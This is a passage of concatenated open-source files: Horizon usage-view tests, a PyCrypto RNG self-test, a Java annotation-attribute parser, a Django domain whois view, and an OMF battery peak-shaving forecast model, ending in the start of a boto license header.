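#     h, s, v = rgb_to_hsv(0.2, 0.4, 0.4)  # -> (0.5, 0.5, 0.4)
#     hsv_to_rgb(h, s, v)                  # -> (0.2, 0.4, 0.4)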
| apache-2.0 |
dan1/horizon-x509 | openstack_dashboard/dashboards/project/overview/tests.py | 8 | 15122 | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import logging
from django.conf import settings
from django.contrib.auth import REDIRECT_FIELD_NAME # noqa
from django.core.urlresolvers import reverse
from django import http
from django.utils import timezone
from mox3.mox import IsA # noqa
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
from openstack_dashboard import usage
INDEX_URL = reverse('horizon:project:overview:index')
class UsageViewTests(test.TestCase):
@test.create_stubs({api.nova: ('usage_get',
'tenant_absolute_limits',
'extension_supported')})
def _stub_nova_api_calls(self, nova_stu_enabled=True,
tenant_limits_exception=False,
stu_exception=False):
api.nova.extension_supported(
'SimpleTenantUsage', IsA(http.HttpRequest)) \
.AndReturn(nova_stu_enabled)
api.nova.extension_supported(
'SimpleTenantUsage', IsA(http.HttpRequest)) \
.AndReturn(nova_stu_enabled)
if tenant_limits_exception:
api.nova.tenant_absolute_limits(IsA(http.HttpRequest))\
.AndRaise(tenant_limits_exception)
else:
api.nova.tenant_absolute_limits(IsA(http.HttpRequest)) \
.AndReturn(self.limits['absolute'])
if nova_stu_enabled:
self._nova_stu_enabled(stu_exception)
@test.create_stubs({api.cinder: ('tenant_absolute_limits',)})
def _stub_cinder_api_calls(self):
api.cinder.tenant_absolute_limits(IsA(http.HttpRequest)) \
.AndReturn(self.cinder_limits['absolute'])
@test.create_stubs({api.neutron: ('is_extension_supported',),
api.network: ('floating_ip_supported',
'tenant_floating_ip_list',
'security_group_list')})
def _stub_neutron_api_calls(self, neutron_sg_enabled=True):
api.neutron.is_extension_supported(
IsA(http.HttpRequest),
'security-group').AndReturn(neutron_sg_enabled)
api.network.floating_ip_supported(IsA(http.HttpRequest)) \
.AndReturn(True)
api.network.tenant_floating_ip_list(IsA(http.HttpRequest)) \
.AndReturn(self.floating_ips.list())
if neutron_sg_enabled:
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.q_secgroups.list())
def _nova_stu_enabled(self, exception=False):
now = timezone.now()
start = datetime.datetime(now.year, now.month, 1, 0, 0, 0, 0)
end = datetime.datetime(now.year, now.month, now.day, 23, 59, 59, 0)
if exception:
api.nova.usage_get(IsA(http.HttpRequest), self.tenant.id,
start, end) \
.AndRaise(exception)
else:
api.nova.usage_get(IsA(http.HttpRequest), self.tenant.id,
start, end) \
.AndReturn(api.nova.NovaUsage(self.usages.first()))
def _common_assertions(self, nova_stu_enabled,
maxTotalFloatingIps=float("inf")):
res = self.client.get(reverse('horizon:project:overview:index'))
usages = res.context['usage']
self.assertTemplateUsed(res, 'project/overview/usage.html')
self.assertIsInstance(usages, usage.ProjectUsage)
self.assertEqual(nova_stu_enabled,
res.context['simple_tenant_usage_enabled'])
if nova_stu_enabled:
self.assertContains(res, 'form-inline')
else:
self.assertNotContains(res, 'form-inline')
self.assertEqual(usages.limits['maxTotalFloatingIps'],
maxTotalFloatingIps)
def test_usage(self):
self._test_usage(nova_stu_enabled=True)
def test_usage_disabled(self):
self._test_usage(nova_stu_enabled=False)
def _test_usage(self, nova_stu_enabled):
self._stub_nova_api_calls(nova_stu_enabled)
self._stub_neutron_api_calls()
self._stub_cinder_api_calls()
self.mox.ReplayAll()
self._common_assertions(nova_stu_enabled)
def test_usage_nova_network(self):
self._test_usage_nova_network(nova_stu_enabled=True)
def test_usage_nova_network_disabled(self):
self._test_usage_nova_network(nova_stu_enabled=False)
@test.create_stubs({api.base: ('is_service_enabled',),
api.cinder: ('is_volume_service_enabled',)})
def _test_usage_nova_network(self, nova_stu_enabled):
self._stub_nova_api_calls(nova_stu_enabled)
api.base.is_service_enabled(IsA(http.HttpRequest), 'network') \
.MultipleTimes().AndReturn(False)
api.cinder.is_volume_service_enabled(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(False)
self.mox.ReplayAll()
self._common_assertions(nova_stu_enabled, maxTotalFloatingIps=10)
@test.create_stubs({api.nova: ('usage_get',
'extension_supported')})
def _stub_nova_api_calls_unauthorized(self, exception):
api.nova.extension_supported(
'SimpleTenantUsage', IsA(http.HttpRequest)) \
.AndReturn(True)
self._nova_stu_enabled(exception)
def test_unauthorized(self):
self._stub_nova_api_calls_unauthorized(
self.exceptions.nova_unauthorized)
self.mox.ReplayAll()
url = reverse('horizon:project:overview:index')
# Avoid the log message in the test
# when unauthorized exception will be logged
logging.disable(logging.ERROR)
res = self.client.get(url)
logging.disable(logging.NOTSET)
self.assertEqual(302, res.status_code)
self.assertEqual(('Location', settings.TESTSERVER +
settings.LOGIN_URL + '?' +
REDIRECT_FIELD_NAME + '=' + url),
res._headers.get('location', None),)
def test_usage_csv(self):
self._test_usage_csv(nova_stu_enabled=True)
def test_usage_csv_disabled(self):
self._test_usage_csv(nova_stu_enabled=False)
def _test_usage_csv(self, nova_stu_enabled=True):
self._stub_nova_api_calls(nova_stu_enabled)
self._stub_neutron_api_calls()
self._stub_cinder_api_calls()
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:project:overview:index') +
"?format=csv")
self.assertTemplateUsed(res, 'project/overview/usage.csv')
self.assertIsInstance(res.context['usage'], usage.ProjectUsage)
def test_usage_exception_usage(self):
self._stub_nova_api_calls(stu_exception=self.exceptions.nova)
self._stub_neutron_api_calls()
self._stub_cinder_api_calls()
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:project:overview:index'))
self.assertTemplateUsed(res, 'project/overview/usage.html')
self.assertEqual(res.context['usage'].usage_list, [])
def test_usage_exception_quota(self):
self._stub_nova_api_calls(tenant_limits_exception=self.exceptions.nova)
self._stub_neutron_api_calls()
self._stub_cinder_api_calls()
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:project:overview:index'))
self.assertTemplateUsed(res, 'project/overview/usage.html')
self.assertEqual(res.context['usage'].quotas, {})
def test_usage_default_tenant(self):
self._stub_nova_api_calls()
self._stub_neutron_api_calls()
self._stub_cinder_api_calls()
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:project:overview:index'))
self.assertTemplateUsed(res, 'project/overview/usage.html')
self.assertIsInstance(res.context['usage'], usage.ProjectUsage)
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_usage_with_neutron(self):
self._test_usage_with_neutron(neutron_sg_enabled=True)
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_usage_with_neutron_nova_security_group(self):
self._test_usage_with_neutron(neutron_sg_enabled=False)
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_usage_with_neutron_floating_ip_disabled(self):
self._test_usage_with_neutron(neutron_fip_enabled=False)
@test.create_stubs({api.neutron: ('tenant_quota_get',
'is_extension_supported'),
api.network: ('floating_ip_supported',
'tenant_floating_ip_list',
'security_group_list')})
def _test_usage_with_neutron_prepare(self):
self._stub_nova_api_calls()
self._stub_cinder_api_calls()
def _test_usage_with_neutron(self, neutron_sg_enabled=True,
neutron_fip_enabled=True):
self._test_usage_with_neutron_prepare()
api.neutron.is_extension_supported(
IsA(http.HttpRequest), 'quotas').AndReturn(True)
api.neutron.is_extension_supported(
IsA(http.HttpRequest),
'security-group').AndReturn(neutron_sg_enabled)
api.network.floating_ip_supported(IsA(http.HttpRequest)) \
.AndReturn(neutron_fip_enabled)
if neutron_fip_enabled:
api.network.tenant_floating_ip_list(IsA(http.HttpRequest)) \
.AndReturn(self.floating_ips.list())
if neutron_sg_enabled:
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.q_secgroups.list())
api.neutron.tenant_quota_get(IsA(http.HttpRequest), self.tenant.id) \
.AndReturn(self.neutron_quotas.first())
self.mox.ReplayAll()
self._test_usage_with_neutron_check(neutron_sg_enabled,
neutron_fip_enabled)
def _test_usage_with_neutron_check(self, neutron_sg_enabled=True,
neutron_fip_expected=True,
max_fip_expected=50,
max_sg_expected=20):
res = self.client.get(reverse('horizon:project:overview:index'))
if neutron_fip_expected:
self.assertContains(res, 'Floating IPs')
self.assertContains(res, 'Security Groups')
res_limits = res.context['usage'].limits
        # Make sure the floating IP limit comes from Neutron (50 vs. 10)
max_floating_ips = res_limits['maxTotalFloatingIps']
self.assertEqual(max_floating_ips, max_fip_expected)
if neutron_sg_enabled:
# Make sure the security group limit comes from Neutron (20 vs. 10)
max_security_groups = res_limits['maxSecurityGroups']
self.assertEqual(max_security_groups, max_sg_expected)
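        # Illustrative shape of the limits dict asserted on above (values come
        # from the test fixtures; the 50/20 pair appears only when Neutron
        # supplies the quotas):
        #   res.context['usage'].limits ~= {'maxTotalFloatingIps': 50,
        #                                   'maxSecurityGroups': 20, ...}
        # with the Nova-side defaults in the fixtures being 10 apiece.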
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_usage_with_neutron_quotas_ext_error(self):
self._test_usage_with_neutron_prepare()
api.neutron.is_extension_supported(
IsA(http.HttpRequest), 'quotas').AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
self._test_usage_with_neutron_check(neutron_fip_expected=False,
max_fip_expected=float("inf"),
max_sg_expected=float("inf"))
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_usage_with_neutron_sg_ext_error(self):
self._test_usage_with_neutron_prepare()
api.neutron.is_extension_supported(
IsA(http.HttpRequest), 'quotas').AndReturn(True)
api.neutron.is_extension_supported(
IsA(http.HttpRequest),
'security-group').AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
self._test_usage_with_neutron_check(neutron_fip_expected=False,
max_fip_expected=float("inf"),
max_sg_expected=float("inf"))
def test_usage_with_cinder(self):
self._test_usage_cinder(cinder_enabled=True)
def test_usage_without_cinder(self):
self._test_usage_cinder(cinder_enabled=False)
@test.create_stubs({api.base: ('is_service_enabled',),
api.cinder: ('is_volume_service_enabled',)})
def _test_usage_cinder(self, cinder_enabled):
self._stub_nova_api_calls(True)
if cinder_enabled:
self._stub_cinder_api_calls()
api.base.is_service_enabled(IsA(http.HttpRequest), 'network') \
.MultipleTimes().AndReturn(False)
api.cinder.is_volume_service_enabled(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(cinder_enabled)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:project:overview:index'))
usages = res.context['usage']
self.assertTemplateUsed(res, 'project/overview/usage.html')
self.assertIsInstance(usages, usage.ProjectUsage)
if cinder_enabled:
self.assertEqual(usages.limits['totalVolumesUsed'], 1)
self.assertEqual(usages.limits['maxTotalVolumes'], 10)
self.assertEqual(usages.limits['totalGigabytesUsed'], 5)
self.assertEqual(usages.limits['maxTotalVolumeGigabytes'], 1000)
else:
self.assertNotIn('totalVolumesUsed', usages.limits)
def _test_usage_charts(self):
self._stub_nova_api_calls(False)
self._stub_neutron_api_calls()
self._stub_cinder_api_calls()
self.mox.ReplayAll()
return self.client.get(reverse('horizon:project:overview:index'))
def test_usage_charts_created(self):
res = self._test_usage_charts()
        self.assertIn('charts', res.context)
def test_usage_charts_infinite_quota(self):
res = self._test_usage_charts()
max_floating_ips = res.context['usage'].limits['maxTotalFloatingIps']
self.assertEqual(max_floating_ips, float("inf"))
self.assertContains(res, '(No Limit)')
| apache-2.0 |
benschmaus/catapult | third_party/google-endpoints/Crypto/SelfTest/Random/OSRNG/test_posix.py | 131 | 1777 | # -*- coding: utf-8 -*-
#
# SelfTest/Random/OSRNG/test_posix.py: Self-test for the OSRNG.posix.new() function
#
# Written in 2008 by Dwayne C. Litzenberger <[email protected]>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test suite for Crypto.Random.OSRNG.posix"""
__revision__ = "$Id$"
import unittest
class SimpleTest(unittest.TestCase):
def runTest(self):
"""Crypto.Random.OSRNG.posix.new()"""
        # Import the OSRNG.posix module and try to use it
import Crypto.Random.OSRNG.posix
randobj = Crypto.Random.OSRNG.posix.new()
x = randobj.read(16)
y = randobj.read(16)
self.assertNotEqual(x, y)
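        # Two successive 16-byte reads from a live OS RNG collide with
        # probability 2**-128, so inequality is a cheap liveness check.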
def get_tests(config={}):
return [SimpleTest()]
if __name__ == '__main__':
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4 expandtab:
| bsd-3-clause |
fesh0r/pjp | pjp/attribute/attrib_annotations.py | 1 | 7969 | from .attrib_base import AttributeBase, AttributeLengthError
from ..constantpool import ConstantType
__all__ = ['AttributeRuntimeVisibleAnnotations', 'AttributeRuntimeInvisibleAnnotations',
'AttributeRuntimeVisibleParameterAnnotations', 'AttributeRuntimeInvisibleParameterAnnotations',
'AttributeAnnotationDefault']
class Error(Exception):
pass
class AnnotationError(Error):
pass
class AttributeRuntimeVisibleAnnotations(AttributeBase):
def __init__(self, type_index, parent):
AttributeBase.__init__(self, type_index, parent)
num_annotations, = self.read_data('>H')
expected_length = 2
self.annotations = []
for _ in range(num_annotations):
annotation = _Annotation(self)
expected_length += annotation.length
self.annotations.append(annotation)
if expected_length != self.length:
raise AttributeLengthError
def __str__(self):
return '%s(%s)' % (self.type, len(self.annotations))
class AttributeRuntimeInvisibleAnnotations(AttributeBase):
def __init__(self, type_index, parent):
AttributeBase.__init__(self, type_index, parent)
num_annotations, = self.read_data('>H')
expected_length = 2
self.annotations = []
for _ in range(num_annotations):
annotation = _Annotation(self)
expected_length += annotation.length
self.annotations.append(annotation)
if expected_length != self.length:
raise AttributeLengthError
def __str__(self):
return '%s(%s)' % (self.type, len(self.annotations))
class AttributeRuntimeVisibleParameterAnnotations(AttributeBase):
def __init__(self, type_index, parent):
AttributeBase.__init__(self, type_index, parent)
num_parameters, = self.read_data('>B')
expected_length = 1
self.parameters = []
for _ in range(num_parameters):
num_annotations, = self.read_data('>H')
expected_length += 2
annotations = []
for _ in range(num_annotations):
annotation = _Annotation(self)
expected_length += annotation.length
annotations.append(annotation)
self.parameters.append(annotations)
if expected_length != self.length:
raise AttributeLengthError
def __str__(self):
return '%s(%s)' % (self.type, len(self.parameters))
class AttributeRuntimeInvisibleParameterAnnotations(AttributeBase):
def __init__(self, type_index, parent):
AttributeBase.__init__(self, type_index, parent)
num_parameters, = self.read_data('>B')
expected_length = 1
self.parameters = []
for _ in range(num_parameters):
num_annotations, = self.read_data('>H')
expected_length += 2
annotations = []
for _ in range(num_annotations):
annotation = _Annotation(self)
expected_length += annotation.length
annotations.append(annotation)
self.parameters.append(annotations)
if expected_length != self.length:
raise AttributeLengthError
def __str__(self):
return '%s(%s)' % (self.type, len(self.parameters))
class AttributeAnnotationDefault(AttributeBase):
def __init__(self, type_index, parent):
AttributeBase.__init__(self, type_index, parent)
self.default_value = _ElementValue(self)
if self.default_value.length != self.length:
raise AttributeLengthError
def __str__(self):
return '%s(%s)' % (self.type, self.default_value)
class _Annotation(object):
def __init__(self, parent):
self._parent = parent
self.read_data = parent.read_data
self.constant_pool = parent.constant_pool
self._type_index, = self.read_data('>H')
self.length = 2
self.type = self.constant_pool.ref(self._type_index, [ConstantType.UTF8])
num_element_value_pairs, = self.read_data('>H')
self.length += 2
self.element_value_pairs = []
for _ in range(num_element_value_pairs):
element_name_index, = self.read_data('>H')
self.length += 2
element_name = self.constant_pool.ref(element_name_index, [ConstantType.UTF8])
element_value = _ElementValue(self)
self.length += element_value.length
self.element_value_pairs.append((element_name, element_value))
def __str__(self):
return '%s(%s)' % (self.type, len(self.element_value_pairs))
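# For reference, the class-file layout _Annotation walks (JVMS section 4.7.16);
# the field names below follow the spec, not this module:
#
#   annotation {
#       u2 type_index;                 # CONSTANT_Utf8, e.g. "Ljava/lang/Deprecated;"
#       u2 num_element_value_pairs;
#       {   u2            element_name_index;
#           element_value value;
#       } element_value_pairs[num_element_value_pairs];
#   }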
class _ElementValue(object):
    # Constant-valued element tags and the constant pool entry type each one
    # references (JVMS section 4.7.16.1). 'B'/'C'/'I'/'S'/'Z' (byte, char, int,
    # short, boolean) are all stored as CONSTANT_Integer; 's' is a string
    # constant and 'c' a class descriptor, both stored as CONSTANT_Utf8.
    _CONST_TAGS = {
        'B': ConstantType.INTEGER,
        'C': ConstantType.INTEGER,
        'D': ConstantType.DOUBLE,
        'F': ConstantType.FLOAT,
        'I': ConstantType.INTEGER,
        'J': ConstantType.LONG,
        'S': ConstantType.INTEGER,
        'Z': ConstantType.INTEGER,
        's': ConstantType.UTF8,
        'c': ConstantType.UTF8,
    }
    def __init__(self, parent):
        self._parent = parent
        self.read_data = parent.read_data
        self.constant_pool = parent.constant_pool
        self.tag, = self.read_data('>B')
        self.length = 1
        tag = chr(self.tag)
        if tag in self._CONST_TAGS:
            self._value_index, = self.read_data('>H')
            self.length += 2
            self.value = self.constant_pool.ref(self._value_index, [self._CONST_TAGS[tag]])
        elif tag == 'e':
            # Enum constant: type descriptor followed by the constant's name.
            self._type_name_index, = self.read_data('>H')
            self.length += 2
            self.type_name = self.constant_pool.ref(self._type_name_index, [ConstantType.UTF8])
            self._const_name_index, = self.read_data('>H')
            self.length += 2
            self.const_name = self.constant_pool.ref(self._const_name_index, [ConstantType.UTF8])
            self.value = (self.type_name, self.const_name)
        elif tag == '@':
            # Nested annotation value.
            annotation = _Annotation(self)
            self.value = annotation
            self.length += annotation.length
        elif tag == '[':
            # Array of element values.
            num_values, = self.read_data('>H')
            self.length += 2
            self.value = []
            for _ in range(num_values):
                element = _ElementValue(self)
                self.length += element.length
                self.value.append(element)
        else:
            raise AnnotationError('Unknown annotation element tag: %c' % tag)
def __str__(self):
return '%c(%s)' % (self.tag, self.value)
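# Worked example (hypothetical constant-pool contents): a source-level
# annotation element such as @Retention(RetentionPolicy.RUNTIME) is encoded
# as tag 'e' followed by two UTF8 indices, so this parser would produce
# _ElementValue.value == (u'Ljava/lang/annotation/RetentionPolicy;', u'RUNTIME').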
| mit |
josiasjuniorx/consulta-dominio | dominio/views.py | 1 | 1320 | from .whois import *
import verifica_site
from django.shortcuts import render
import os
import logging
from django.http import HttpResponse, HttpRequest, HttpResponseRedirect
from django.urls import reverse
logger = logging.getLogger("CONSULTAS")
logger.setLevel(logging.INFO)
handler = logging.FileHandler('static/logs.html')
# Each record is written to static/logs.html, so the row markup must be
# self-contained (the original format string left the table and center
# elements unclosed, producing malformed HTML for every log line).
formatter = logging.Formatter(
    '<center><table style="border:1px;border-style:solid;'
    'width:900px;color:blue;border-color:black;font-size:12px">'
    '<tr><td>%(asctime)s [UTC] - %(message)s</td></tr></table></center>',
    datefmt='%d/%b/%Y %H:%M:%S'
)
handler.setFormatter(formatter)
logger.addHandler(handler)
def index(request):
if not request.method == 'POST':
return render(request, 'dominio/index.html')
dominio = request.POST['dominio']
dominio = clean_dominio(dominio)
cliente = request.META.get('REMOTE_ADDR')
nserver = request.POST['nserver']
whois = consulta_whois(dominio)
enderecos = consulta_host(dominio, nserver)
    logger.info('[ %s ] queried domain ( %s )', cliente, dominio)
return render(request, 'dominio/index.html', {
'dominio': dominio,
'enderecos': enderecos,
'whois': whois
})
def site(request):
dominio = request.GET['dominio']
return HttpResponse(verifica_site.requisicao(dominio))
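# Illustrative wiring (assumed, not part of this file): the two views above
# would typically be routed along these lines in the app's urls.py.
#
#   from django.urls import path
#   from . import views
#   urlpatterns = [
#       path('', views.index, name='index'),
#       path('site/', views.site, name='site'),
#   ]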
| gpl-3.0 |
dpinney/omf | omf/scratch/Neural_Net_Experimentation/deleted models/forecastStoragePeakShave.py | 1 | 7466 | ''' Apply PNNL VirtualBatteries (VBAT) load model to day ahead forecast.'''
import pandas as pd
import numpy as np
from sklearn import linear_model
import pulp
from os.path import isdir, join as pJoin
import __neoMetaModel__
from __neoMetaModel__ import *
from omf import forecast as fc
# Model metadata:
modelName, template = metadata(__file__)
tooltip = ('Calculate the virtual battery capacity for a collection of '
'thermostically controlled loads with day-ahead forecasting.')
hidden = True
def work(modelDir, ind):
#print(ind)
''' Run the model in its directory.'''
# drop inverter efficiency
# drop DoD
(cellCapacity, dischargeRate, chargeRate, cellQuantity, cellCost) = \
[float(ind[x]) for x in ('cellCapacity', 'dischargeRate', 'chargeRate', 'cellQuantity', 'cellCost')]
battEff = float(ind.get("batteryEfficiency")) / 100.0
dodFactor = float(ind.get('dodFactor')) / 100.0
projYears = int(ind.get('projYears'))
batteryCycleLife = int(ind.get('batteryCycleLife'))
o = {}
try:
with open(pJoin(modelDir, 'hist.csv'), 'w') as f:
f.write(ind['historicalData'].replace('\r', ''))
df = pd.read_csv(pJoin(modelDir, 'hist.csv'), parse_dates=['dates'])
df['month'] = df['dates'].dt.month
df['dayOfYear'] = df['dates'].dt.dayofyear
assert df.shape[0] >= 26280 # must be longer than 3 years
assert df.shape[1] == 5
except:
raise Exception("CSV file is incorrect format.")
# retrieve goal
goal = ind['goal']
threshold = float(ind['transformerThreshold'])*1000
confidence = float(ind['confidence'])/100
# train model on previous data
all_X = fc.makeUsefulDf(df)
all_y = df['load']
X_train, y_train = all_X[:-8760], all_y[:-8760]
clf = linear_model.SGDRegressor(max_iter=10000, tol=1e-4)
clf.fit(X_train, y_train)
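	# Assumed modeling intent: a linear SGD regressor over the calendar and
	# weather features built by fc.makeUsefulDf, with the final 8760 hours
	# (one year) held out below as the test/dispatch horizon.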
# ---------------------- MAKE PREDICTIONS ------------------------------- #
X_test, y_test = all_X[-8760:], all_y[-8760:]
# Collect data necessary for dispatch calculations
predictions = clf.predict(X_test)
dailyLoadPredictions = [predictions[i:i+24] for i in range(0, len(predictions), 24)]
weather = df['tempc'][-8760:]
dailyWeatherPredictions = [weather[i:i+24] for i in range(0, len(weather), 24)]
	month = df['month'][-8760:]
	# Collapse the hourly month series to one value per day; zipping the raw
	# hourly series against the daily prediction lists would pair day i with
	# the month of hour i rather than the month of day i.
	dailyMonths = [month.iloc[i] for i in range(0, len(month), 24)]
	dispatched = [False]*365
	# decide to implement VBAT every day for a year
	VB_power, VB_energy = [], []
	for i, (load24, temp24, m) in enumerate(zip(dailyLoadPredictions, dailyWeatherPredictions, dailyMonths)):
peak = max(load24)
if fc.shouldDispatchPS(peak, m, df, confidence):
dispatched[i] = True
vbp, vbe = fc.pulp24hrBattery(load24, dischargeRate*cellQuantity,
cellCapacity*cellQuantity, battEff)
VB_power.extend(vbp)
VB_energy.extend(vbe)
else:
VB_power.extend([0]*24)
VB_energy.extend([0]*24)
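	# Assumed semantics of omf.forecast here: on a dispatch day pulp24hrBattery
	# returns a 24-hour battery power profile (negative while discharging into
	# the peak, so demand + VB_power shaves it) and the matching state-of-charge
	# trace, keeping VB_power and VB_energy at 8760 entries for the year.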
# -------------------- MODEL ACCURACY ANALYSIS -------------------------- #
o['predictedLoad'] = list(clf.predict(X_test))
o['trainAccuracy'] = round(clf.score(X_train, y_train) * 100, 2)
o['testAccuracy'] = round(clf.score(X_test, y_test) * 100, 2)
# PRECISION AND RECALL
maxDays = []
for month in range(1, 13):
test = df[df['month'] == month]
maxDays.append(test.loc[test['load'].idxmax()]['dayOfYear'])
shouldHaveDispatched = [False]*365
for day in maxDays:
shouldHaveDispatched[day] = True
truePositive = len([b for b in [i and j for (i, j) in zip(dispatched, shouldHaveDispatched)] if b])
falsePositive = len([b for b in [i and (not j) for (i, j) in zip(dispatched, shouldHaveDispatched)] if b])
falseNegative = len([b for b in [(not i) and j for (i, j) in zip(dispatched, shouldHaveDispatched)] if b])
o['precision'] = round(truePositive / float(truePositive + falsePositive) * 100, 2)
o['recall'] = round(truePositive / float(truePositive + falseNegative) * 100, 2)
o['number_of_dispatches'] = len([i for i in dispatched if i])
	o['MAE'] = round(sum([abs(l-m)/m*100 for l, m in zip(predictions, list(y_test))])/8760., 2)  # mean absolute percent error (MAPE), reported under the MAE key
# ---------------------- FINANCIAL ANALYSIS ----------------------------- #
o['VBpower'], o['VBenergy'] = list(VB_power), list(VB_energy)
# Calculate monthHours
year = df[-8760:].copy()
year.reset_index(inplace=True)
year['hour'] = list(year.index)
start = list(year.groupby('month').first()['hour'])
finish = list(year.groupby('month').last()['hour'])
monthHours = [(s, f+1) for (s, f) in zip(start, finish)]
demand = list(y_test)
peakDemand = [max(demand[s:f]) for s, f in monthHours]
energyMonthly = [sum(demand[s:f]) for s, f in monthHours]
demandAdj = [d+p for d, p in zip(demand, o['VBpower'])]
peakAdjustedDemand = [max(demandAdj[s:f]) for s, f in monthHours]
energyAdjustedMonthly = [sum(demandAdj[s:f]) for s, f in monthHours]
o['demand'] = demand
o['peakDemand'] = peakDemand
o['energyMonthly'] = energyMonthly
o['demandAdjusted'] = demandAdj
o['peakAdjustedDemand'] = peakAdjustedDemand
o['energyAdjustedMonthly'] = energyAdjustedMonthly
initInvestment = cellCost*cellQuantity
eCost = float(ind['electricityCost'])
dCharge = float(ind['demandChargeCost'])
o['VBdispatch'] = [dal-d for dal, d in zip(demandAdj, demand)]
o['energyCost'] = [em*eCost for em in energyMonthly]
o['energyCostAdjusted'] = [eam*eCost for eam in energyAdjustedMonthly]
o['demandCharge'] = [peak*dCharge for peak in peakDemand]
o['demandChargeAdjusted'] = [pad*dCharge for pad in o['peakAdjustedDemand']]
o['totalCost'] = [ec+dcm for ec, dcm in zip(o['energyCost'], o['demandCharge'])]
o['totalCostAdjusted'] = [eca+dca for eca, dca in zip(o['energyCostAdjusted'], o['demandChargeAdjusted'])]
o['savings'] = [tot-tota for tot, tota in zip(o['totalCost'], o['totalCostAdjusted'])]
annualEarnings = sum(o['savings']) # - something!
cashFlowList = [annualEarnings] * int(ind['projectionLength'])
cashFlowList.insert(0, -1*initInvestment)
o['NPV'] = np.npv(float(ind['discountRate'])/100, cashFlowList)
o['SPP'] = initInvestment / annualEarnings
o['netCashflow'] = cashFlowList
o['cumulativeCashflow'] = [sum(cashFlowList[:i+1]) for i, d in enumerate(cashFlowList)]
	o['dataCheck'] = 'Threshold exceeded' if any([i > threshold for i in demandAdj]) and goal == 'deferral' else ''
o['transformerThreshold'] = threshold if goal == 'deferral' else None
o['stdout'] = 'Success'
return o
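# Worked example of the cash-flow math in work() (hypothetical numbers): with
# cellCost=7140 and cellQuantity=25 the initial investment is 7140 * 25 =
# 178,500; if peak-shave savings total 17,850/year over a 15-year projection
# at a 2% discount rate, then
#   np.npv(0.02, [-178500] + [17850] * 15)  ~  50,900
# and the simple payback period is 178500 / 17850 = 10 years.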
def new(modelDir):
''' Create a new instance of this model. Returns true on success, false on failure. '''
defaultInputs = {
"modelType": modelName,
"user": "admin",
"goal": "peakShave",
"confidence": "80",
"demandChargeCost":"25",
"electricityCost":"0.06",
"projectionLength":"15",
"discountRate":"2",
"historicalData": open(pJoin(__neoMetaModel__._omfDir,"static","testFiles","Texas_17yr_TempAndLoad.csv")).read(),
"filename": "Texas_17yr_TempAndLoad.csv",
"transformerThreshold": "20",
"batteryEfficiency": "92",
"inverterEfficiency": "97.5",
"cellCapacity": "7",
"dischargeRate": "5",
"chargeRate": "5",
"cellCost": "7140",
"cellQuantity": "25",
"projYears": "15",
"chargePriceThreshold": "0.07",
"dischargePriceThreshold":"0.15",
"dodFactor":"100",
"batteryCycleLife": "5000"
}
creationCode = __neoMetaModel__.new(modelDir, defaultInputs)
return creationCode
def _tests():
modelLoc = pJoin(__neoMetaModel__._omfDir,'data','Model','admin','Automated Testing of ' + modelName)
if isdir(modelLoc):
shutil.rmtree(modelLoc)
new(modelLoc) # Create New.
renderAndShow(modelLoc) # Pre-run.
runForeground(modelLoc) # Run the model.
renderAndShow(modelLoc) # Show the output.
if __name__ == '__main__':
_tests()
| gpl-2.0 |
GitHublong/hue | desktop/core/ext-py/boto-2.38.0/boto/rds/vpcsecuritygroupmembership.py | 177 | 3131 | # Copyright (c) 2013 Anthony Tonns http://www.corsis.com/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
